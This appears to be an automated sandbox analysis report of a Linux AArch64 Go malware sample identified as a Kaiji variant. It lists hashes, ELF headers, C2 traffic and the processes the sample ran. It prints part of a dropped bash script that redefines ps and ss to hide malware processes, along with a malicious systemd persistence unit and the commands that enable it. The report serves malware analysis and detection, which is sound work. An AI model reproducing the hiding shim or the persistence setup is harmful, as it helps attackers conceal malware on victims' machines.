                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/bash./etc/profile.d/bash_cfg
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:Bourne-Again shell script, ASCII text executable, with very long lines (913)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6360
                                                                                                  Entropy (8bit):4.790361203858907
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sjahyOjP3ECqh8teJjahyOjP3ECqh8tejjahyOjP3ECqh8te3jahyOjP3ECqh8t2:05bPJJlp
                                                                                                  MD5:7A9FC7634E6653668466240D8751A515
                                                                                                  SHA1:274014F04430E87F983F84A1C7E2C3DCF8E9085F
                                                                                                  SHA-256:FA39BD498A100A5FCFC58F21BBCA292CB456D596AA65EEEF57C454256B325B72
                                                                                                  SHA-512:2073619FB932DF85FDB681616DE0B1B7758D5DAF5688BD48572D477E79563BB1B6A49705E82F08F9C2730B15CFEE199527F38249BCA342E04985C51988818994
                                                                                                  Malicious:true
                                                                                                  Preview:#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" | sed -e '/32676/d');proc_name=$(echo "$proc_name" | sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" | sed -e '/System.mod/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/32676/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" | sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/system-mark/d');proc_name=$(echo "$proc_name" | sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/sleep/d');proc_name=$(echo "$proc_name" | sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" | sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" | sed -e '/linux_aarch64.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" | sed -e '/3
                                                                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):76
                                                                                                  Entropy (8bit):3.7627880354948586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                  Malicious:false
                                                                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                  Process:/usr/sbin/cron
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:V:V
                                                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                  Malicious:false
                                                                                                  Preview:0
                                                                                                  Process:/usr/sbin/cron
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:V:V
                                                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                  Malicious:false
                                                                                                  Preview:0
                                                                                                  Process:/usr/sbin/cron
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10
                                                                                                  Entropy (8bit):1.9219280948873623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:uej:d
                                                                                                  MD5:01CC728A20963C4D6DA27043959B067A
                                                                                                  SHA1:85FB03BA7C8F7EB905F5A5AF090B49261D64EF4A
                                                                                                  SHA-256:F2B3EA70081D7EF54D444825A880B87C80A0802B28235CC6DD8A71E4022E3C87
                                                                                                  SHA-512:B99E7445D14091D6A41AFDA5A87341D1B34D58B2F4DDFFF23563D5D043EC6F909858C51B855F52635B58E58995C63B9DE971D34451D0D1B2F83B10974C5BA726
                                                                                                  Malicious:false
                                                                                                  Preview:6496.6496.
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):125
                                                                                                  Entropy (8bit):3.0617157514606053
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:7KoKJMLIIEYMdSdRFNvX:70JMLIT3dSj
                                                                                                  MD5:C95400A2E6C5183C890BC792800C9759
                                                                                                  SHA1:1B24E0DF2FA7354934C6731396ED6E6E49CA254B
                                                                                                  SHA-256:CA8CCEC9A6C51A6DC0BD6696716DBDF35A8F48D087BDD81E3D7089E33F0193DA
                                                                                                  SHA-512:D42F6C7165BF53953F3B769A316542E653E42E7107A3F5EFD5F49F0965EA5DAFAD206695406B290C83A8CAA2FDDDDF92060A7D8D3306E58D12035FAFAAA4DCE8
                                                                                                  Malicious:false
                                                                                                  Preview:6279 (/tmp/linux_aarch64.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298784 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):186
                                                                                                  Entropy (8bit):4.795801274247707
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
                                                                                                  MD5:B02DE6CD28CD922B18D9D93375A70D8B
                                                                                                  SHA1:021426A5A2FF9EDC80BA5936C94B37525538885E
                                                                                                  SHA-256:D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
                                                                                                  SHA-512:DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
                                                                                                  Malicious:false
                                                                                                  Preview:[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.mod.ExecReload=/boot/System.mod.ExecStop=/boot/System.mod.[Install].WantedBy=multi-user.target
                                                                                                  File type:ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, Go BuildID=p-qnCsvCpziwx1SpyD2u/_QEUImz47GMLE05aSFRk/Ybj99e1GSLjgXcWVw2M1/UybnlT3nZEaLgnM7kiPF, stripped
                                                                                                  Entropy (8bit):5.808647756122976
                                                                                                  TrID:
                                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 98.45%
                                                                                                  • Lumena CEL bitmap (63/63) 1.55%
                                                                                                  File name:linux_aarch64.elf
                                                                                                  File size:2'031'616 bytes
                                                                                                  MD5:b64c72dccf36a9775850933de2e1b852
                                                                                                  SHA1:9196a018e1ee50a59256a69408b7b82dd41d4a27
                                                                                                  SHA256:6acdf01289672bbd8dc5e28d30b8bcf49d4a2e9f4633c8d6379005df3f154dea
                                                                                                  SHA512:749730c8189a231537d7b1f844def89c550861b2a643c0ad7ea5dc540301e1790c0828c77c6aa1a49cae94085d5544a85467b3bb8a04ca58a055766654070d21
                                                                                                  SSDEEP:24576:/wRmgu8dG9qDQtfTBmW0NREmCNPCE98U4TprOEa6QWgrz1v:/euCG9qE5BS0AUrz1
                                                                                                  TLSH:0A955B85BC9DA912E9C97EB56F2502D07225FC4D9F81C7177A00BBAE6DF23588F21360
                                                                                                  File Content Preview:.ELF............................@...................@.8...@.............@.......@.......@...............................................................d.......d..............................................................................................

                                                                                                  ELF header

                                                                                                  Class:ELF64
                                                                                                  Data:2's complement, little endian
                                                                                                  Version:1 (current)
                                                                                                  Machine:AArch64
                                                                                                  Version Number:0x1
                                                                                                  Type:EXEC (Executable file)
                                                                                                  OS/ABI:UNIX - System V
                                                                                                  ABI Version:0
                                                                                                  Entry Point Address:0x717f0
                                                                                                  Flags:0x0
                                                                                                  ELF Header Size:64
                                                                                                  Program Header Offset:64
                                                                                                  Program Header Size:56
                                                                                                  Number of Program Headers:7
                                                                                                  Section Header Offset:456
                                                                                                  Section Header Size:64
                                                                                                  Number of Section Headers:14
                                                                                                  Header String Table Index:3
                                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                  NULL0x00x00x00x00x0000
                                                                                                  .textPROGBITS0x110000x10000xd7f000x00x6AX0016
                                                                                                  .rodataPROGBITS0xf00000xe00000x5853f0x00x2A0032
                                                                                                  .shstrtabSTRTAB0x00x1385400x980x00x0001
                                                                                                  .typelinkPROGBITS0x1485e00x1385e00x8dc0x00x2A0032
                                                                                                  .itablinkPROGBITS0x148ec00x138ec00x2500x00x2A0032
                                                                                                  .gosymtabPROGBITS0x1491100x1391100x00x00x2A001
                                                                                                  .gopclntabPROGBITS0x1491200x1391200x908180x00x2A0032
                                                                                                  .go.buildinfoPROGBITS0x1e00000x1d00000xe00x00x3WA0016
                                                                                                  .noptrdataPROGBITS0x1e00e00x1d00e00x11e0c0x00x3WA0032
                                                                                                  .dataPROGBITS0x1f1f000x1e1f000x7f700x00x3WA0032
                                                                                                  .bssNOBITS0x1f9e800x1e9e800x347200x00x3WA0032
                                                                                                  .noptrbssNOBITS0x22e5a00x21e5a00x46500x00x3WA0032
                                                                                                  .note.go.buildidNOTE0x10f9c0xf9c0x640x00x2A004
                                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                  PHDR0x400x100400x100400x1880x1881.43240x4R 0x10000
                                                                                                  NOTE0xf9c0x10f9c0x10f9c0x640x645.40080x4R 0x4.note.go.buildid
                                                                                                  LOAD0x00x100000x100000xd8f000xd8f006.34160x5R E0x10000.text .note.go.buildid
                                                                                                  LOAD0xe00000xf00000xf00000xe99380xe99385.20210x4R 0x10000.rodata .typelink .itablink .gosymtab .gopclntab
                                                                                                  LOAD0x1d00000x1e00000x1e00000x19e800x52bf04.41690x6RW 0x10000.go.buildinfo .noptrdata .data .bss .noptrbss
                                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                                                  LOOS+50415800x00x00x00x00x00.00000x2a00 0x8
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-11-26T00:00:00.352448+01002044667ET MALWARE Golang/Linux Kaiji Variant Activity1192.168.2.2334026103.135.101.1881930TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 25, 2024 23:59:48.721163988 CET43928443192.168.2.2391.189.91.42
                                                                                                  Nov 25, 2024 23:59:52.560626984 CET4251680192.168.2.23109.202.202.202
                                                                                                  Nov 25, 2024 23:59:54.100403070 CET42836443192.168.2.2391.189.91.43
                                                                                                  Nov 26, 2024 00:00:00.226684093 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:00.346779108 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:00.346927881 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:00.352447987 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:00.472349882 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:01.919471025 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:01.919528008 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:02.564421892 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:02.564553976 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:07.582288980 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:07.582432032 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:10.222235918 CET43928443192.168.2.2391.189.91.42
                                                                                                  Nov 26, 2024 00:00:12.587474108 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:12.587603092 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:17.597637892 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:17.598021030 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:20.460870981 CET42836443192.168.2.2391.189.91.43
                                                                                                  Nov 26, 2024 00:00:22.508604050 CET4251680192.168.2.23109.202.202.202
                                                                                                  Nov 26, 2024 00:00:22.606946945 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:22.607094049 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:27.619363070 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:27.619544029 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:32.629559994 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:32.629690886 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:37.639796972 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:37.639905930 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:42.650068998 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:42.650327921 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:47.661268950 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:47.661462069 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:51.176517010 CET43928443192.168.2.2391.189.91.42
                                                                                                  Nov 26, 2024 00:00:52.671850920 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:52.672013998 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:00:57.681958914 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:00:57.682224989 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:02.693240881 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:02.693363905 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:07.704060078 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:07.704199076 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:12.713201046 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:12.713325024 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:17.723989010 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:17.724142075 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:22.742695093 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:22.742896080 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:27.749059916 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:27.749459028 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:32.759023905 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:32.759464025 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:37.772938967 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:37.773200035 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:42.784327030 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:42.784509897 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:47.795288086 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:47.795375109 CET340261930192.168.2.23103.135.101.188
                                                                                                  Nov 26, 2024 00:01:52.806214094 CET193034026103.135.101.188192.168.2.23
                                                                                                  Nov 26, 2024 00:01:52.806430101 CET340261930192.168.2.23103.135.101.188
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 25, 2024 23:59:59.912817955 CET5310553192.168.2.231.1.1.1
                                                                                                  Nov 25, 2024 23:59:59.915062904 CET4569053192.168.2.231.1.1.1
                                                                                                  Nov 26, 2024 00:00:00.052006006 CET53531051.1.1.1192.168.2.23
                                                                                                  Nov 26, 2024 00:00:00.054033995 CET53456901.1.1.1192.168.2.23
                                                                                                  Nov 26, 2024 00:00:00.071768999 CET4497253192.168.2.231.1.1.1
                                                                                                  Nov 26, 2024 00:00:00.074860096 CET4183153192.168.2.231.1.1.1
                                                                                                  Nov 26, 2024 00:00:00.215059996 CET53449721.1.1.1192.168.2.23
                                                                                                  Nov 26, 2024 00:00:00.222084999 CET53418311.1.1.1192.168.2.23
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Nov 25, 2024 23:59:59.912817955 CET192.168.2.231.1.1.10x1a78Standard query (0)www.google.com28IN (0x0001)false
                                                                                                  Nov 25, 2024 23:59:59.915062904 CET192.168.2.231.1.1.10xa459Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                  Nov 26, 2024 00:00:00.071768999 CET192.168.2.231.1.1.10xb753Standard query (0)wdearas.liveya.org28IN (0x0001)false
                                                                                                  Nov 26, 2024 00:00:00.074860096 CET192.168.2.231.1.1.10x17d5Standard query (0)wdearas.liveya.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Nov 26, 2024 00:00:00.052006006 CET1.1.1.1192.168.2.230x1a78No error (0)www.google.com28IN (0x0001)false
                                                                                                  Nov 26, 2024 00:00:00.054033995 CET1.1.1.1192.168.2.230xa459No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                  Nov 26, 2024 00:00:00.222084999 CET1.1.1.1192.168.2.230x17d5No error (0)wdearas.liveya.org103.135.101.188A (IP address)IN (0x0001)false

                                                                                                  System Behavior

                                                                                                  Start time (UTC):22:59:47
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:/tmp/linux_aarch64.elf
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:48
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:48
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:/tmp/linux_aarch64.elf
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:/bin/bash -c /etc/32676&
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:/etc/32676
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/sleep
                                                                                                  Arguments:sleep 60
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                  Start time (UTC):23:00:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:00:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:00:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/sleep
                                                                                                  Arguments:sleep 60
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                  Start time (UTC):23:01:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:01:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/etc/32676
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:01:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/sleep
                                                                                                  Arguments:sleep 60
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:49
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:service crond start
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl --quiet is-active multi-user.target
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:50
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/sed
                                                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                  File size:121288 bytes
                                                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                  Start time (UTC):22:59:51
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl start crond.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl daemon-reload
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl enable quotaoff.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl start quotaoff.service
                                                                                                  File size:996584 bytes
